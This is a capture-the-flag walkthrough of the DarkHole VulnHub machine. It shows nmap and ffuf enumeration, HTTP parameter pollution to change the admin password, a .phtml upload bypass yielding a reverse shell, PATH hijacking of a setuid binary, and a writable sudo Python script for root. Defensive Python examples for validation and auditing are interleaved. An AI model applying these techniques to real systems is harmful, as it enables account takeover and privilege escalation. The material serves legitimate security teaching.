DarkHole Vulnhub Walkthrough

Creator: Je_1r.
Download Link : https://www.vulnhub.com/entry/darkhole-1,724/


I started the enumeration with an nmap scan to look for open ports and running services. You can also use rustscan for faster results; the command I used is shown below.

nmap -p- -Pn
22/tcp open  ssh
80/tcp open  http

Running nmap scripts to check service versions and other useful information:

nmap -sC -sV -Pn -p22,80 -oN nmap.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e4:50:d9:50:5d:91:30:50:e9:b5:7d:ca:b0:51:db:74 (RSA)
|   256 73:0c:76:86:60:63:06:00:21:c2:36:20:3b:99:c1:f7 (ECDSA)
|_  256 54:53:4c:3f:4f:3a:26:f6:02:aa:9a:24:ea:1b:92:8c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I first enumerated the Apache httpd server on port 80, but there was nothing useful on the main page. Next I used ffuf for a directory brute-force using the command shown below:

ffuf -c -u "" -e .php,.txt,.html,.bak  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404
index.php               [Status: 200, Size: 810, Words: 347, Lines: 29]
login.php               [Status: 200, Size: 2507, Words: 422, Lines: 50]
register.php            [Status: 200, Size: 2886, Words: 512, Lines: 56]
upload                  [Status: 301, Size: 317, Words: 20, Lines: 10]
css                     [Status: 301, Size: 314, Words: 20, Lines: 10]
js                      [Status: 301, Size: 313, Words: 20, Lines: 10]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1]
config                  [Status: 301, Size: 317, Words: 20, Lines: 10]
dashboard.php           [Status: 200, Size: 21, Words: 4, Lines: 1]

I found nothing useful in the directories, but login.php and register.php seemed interesting. I tested the login form for SQL injection to bypass authentication, but the injection payloads didn't work.

After successful registration, I logged in and found a web page where users can update their information.

The GET parameter id looked suspicious to me, so I decided to capture the request and play with this parameter in Burp Suite (a handier way). I first tested for IDOR, but it did not work.

Next I intercepted the request while changing the password.

This time I tested for HTTP parameter pollution, and the response was "200 OK", which means the password was changed successfully. But for which user? The user with id 1 or with id 2?

I tried to log in using my old password and was able to. This means the password was changed for the user with id 1 (maybe admin is the username).

I tried logging in as user admin with the password I had updated, and we were in!
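The root cause above is that the password-change handler trusts the id parameter from the request, so a second id value smuggled in by parameter pollution picks the account. The following is an added example (not code from the DarkHole application) of the two server-side controls that close this: reject duplicated parameters outright, and take the account to modify from the session rather than the request. The USERS table is a constructed stand-in for the app's database.

```python
from urllib.parse import parse_qsl

# Constructed in-memory user table standing in for the application's database.
USERS = {
    1: {"name": "admin", "password": "admin-secret"},
    2: {"name": "attacker", "password": "attacker-pass"},
}


def parse_query_strict(query: str) -> dict:
    """Parse a query string, rejecting any parameter that appears more than once.

    Duplicate keys are exactly how parameter pollution smuggles a second id
    value past a handler that reads only the first (or only the last) copy.
    """
    seen = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key in seen:
            raise ValueError(f"duplicate parameter: {key}")
        seen[key] = value
    return seen


def change_password(session_user_id: int, query: str, new_password: str) -> int:
    """Update the password of the logged-in user only.

    The client-supplied id is parsed (so pollution is rejected) but never
    trusted: the account to modify always comes from the server-side session.
    A mismatch between the two is a tampering signal worth logging.
    """
    params = parse_query_strict(query)
    if "id" in params and params["id"] != str(session_user_id):
        raise PermissionError(
            f"session user {session_user_id} tried to modify id {params['id']}"
        )
    USERS[session_user_id]["password"] = new_password
    return session_user_id
```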

File Upload Bypass

Now that we have access to the admin panel, we also have upload functionality. I tried uploading a file with a .php extension, but only .png, .jpg and .gif files were allowed.

To bypass this server-side check, I simply renamed the shell.php script to shell.phtml and tried uploading the file again.

The file was uploaded successfully and moved to the /upload/ directory. I started a netcat listener on the specified port on my machine and got a reverse shell.

❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 33038
Linux darkhole 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 18:06:30 up 39 min,  0 users,  load average: 0.04, 0.06, 0.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
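The upload check fails because it blocks .php but not the other extensions the PHP handler serves (Ubuntu's default mod_php configuration typically maps .phtml and .phar to PHP as well). Here is an added example, not the DarkHole application's code, of an allowlist-based validator: only the final extension is consulted, it must be on a short allowlist, the content must start with that type's magic bytes, and the stored name is rebuilt from a content hash so no user-controlled characters reach the filesystem. The magic-byte table is constructed from the standard file signatures.

```python
import hashlib
import os

# Extensions the application intends to allow; compared against the LAST
# extension only, after lower-casing, so shell.png.phtml is rejected.
ALLOWED_EXTENSIONS = {"png", "jpg", "gif"}

# Standard file signatures for the allowed image types (constructed table).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def safe_upload_name(filename: str, data: bytes) -> str:
    """Return the name to store the upload under, or raise ValueError.

    Rejecting everything not explicitly allowed means shell.phtml, shell.phar
    and shell.php all fail the same check, instead of relying on a denylist
    that has to know every extension the web server hands to PHP.
    """
    base = os.path.basename(filename).lower()
    if "." not in base:
        raise ValueError("no extension")
    ext = base.rsplit(".", 1)[1]
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext}")
    if not data.startswith(MAGIC[ext]):
        raise ValueError("content does not match extension")
    # Rebuild the stored name from the content hash: the original filename
    # (and any path components or extra dots in it) never reaches disk.
    digest = hashlib.sha256(data).hexdigest()[:16]
    return f"{digest}.{ext}"
```

Serving the upload directory with PHP execution disabled (for example php_admin_flag engine off in that directory's Apache config) is the second layer; validation alone should not be the only control.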

User Shell

I started enumerating the box and found an interesting SUID binary using the command shown below:

find / -perm -u=s -type f 2>/dev/null

After running the toto binary, I found that it runs the id command after setting the uid and gid to those of user john. To confirm this, I ran the strings command on the toto binary.

www-data@darkhole:/home/john$ ./toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
www-data@darkhole:/home/john$ strings toto | head

Next I opened this binary in Ghidra and, after analyzing it, found that it is vulnerable to PATH hijacking: it calls id by name rather than by absolute path, so the lookup goes through the caller's PATH.

We can take advantage of this by creating our own evil version of id, placed first in PATH, to get a shell as user john.

www-data@darkhole:/tmp$ cat id
www-data@darkhole:/tmp$ chmod 777 id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
www-data@darkhole:/tmp$ /home/john/toto
john@darkhole:/tmp$ whoami

Root Shell

Getting root was very simple. In john's home directory, I found a password file containing the password of user john.

Next I ran sudo -l to check for sudo permissions and found this:

john@darkhole:/home/john$ cat password 
john@darkhole:/home/john$ sudo -l
[sudo] password for john: 
Matching Defaults entries for john on darkhole:
    env_reset, mail_badpass,

User john may run the following commands on darkhole:
    (root) /usr/bin/python3 /home/john/file.py

As user john we can edit file.py, so using the os module in Python I added code to pop a shell as user root!

john@darkhole:/home/john$ cat file.py 

import os


john@darkhole:/home/john$ sudo -u root /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# cd /root
root@darkhole:~# cat root.txt 
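Both privilege escalations on this box come from misconfigurations that an audit script can flag before anyone runs Ghidra: a setuid binary that resolves a command name through PATH (the toto section) and a sudo rule that runs an interpreter on a script the granted user can write (the file.py section). The following is an added example written for this walkthrough, not a tool from the box or its author; it works on strings output and os.stat-style mode/owner values so it runs offline, and the command list and sample strings output are constructed.

```python
import re
import stat
from typing import Optional, Set, List

# Command names a setuid binary should never look up via PATH (constructed list).
COMMON_COMMANDS = {"id", "whoami", "cat", "ls", "sh", "bash", "cp", "mv", "chmod"}


def relative_commands_in_strings(strings_output: str) -> List[str]:
    """Return bare command names found in `strings` output of a binary.

    A setuid binary passing such a name to system()/execvp() resolves it via
    the caller's PATH; an absolute path like /usr/bin/id is not flagged.
    """
    found = set()
    for line in strings_output.splitlines():
        token = line.strip().split(" ")[0]
        if token in COMMON_COMMANDS:
            found.add(token)
    return sorted(found)


def script_from_sudo_rule(rule: str) -> Optional[str]:
    """From a `sudo -l` line such as '(root) /usr/bin/python3 /home/john/file.py'
    return the script an interpreter will execute, or None for other rules."""
    m = re.match(r"\(\S+\)\s+(\S+)\s+(\S+)$", rule.strip())
    if not m:
        return None
    interpreter, arg = m.groups()
    name = interpreter.rsplit("/", 1)[-1]
    if name.startswith(("python", "perl", "ruby", "bash", "sh")):
        return arg
    return None


def sudo_script_is_caller_writable(mode: int, owner_uid: int, owner_gid: int,
                                   caller_uid: int, caller_gids: Set[int]) -> bool:
    """True if the script a sudo rule runs as root is writable by the user the
    rule is granted to (mode/owner as returned by os.stat on the script)."""
    if caller_uid == owner_uid and mode & stat.S_IWUSR:
        return True
    if owner_gid in caller_gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)
```

Feeding the output of `strings` on each result of the find command above into relative_commands_in_strings, and each `sudo -l` line into the two sudo helpers, reproduces the manual checks from this walkthrough as a repeatable audit.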

We are now root and also we have completed this challenge! For any queries you can PM me on discord - golith3r00t#1859.

NOTE: The awesome artwork used in this article was created by Alex Pista.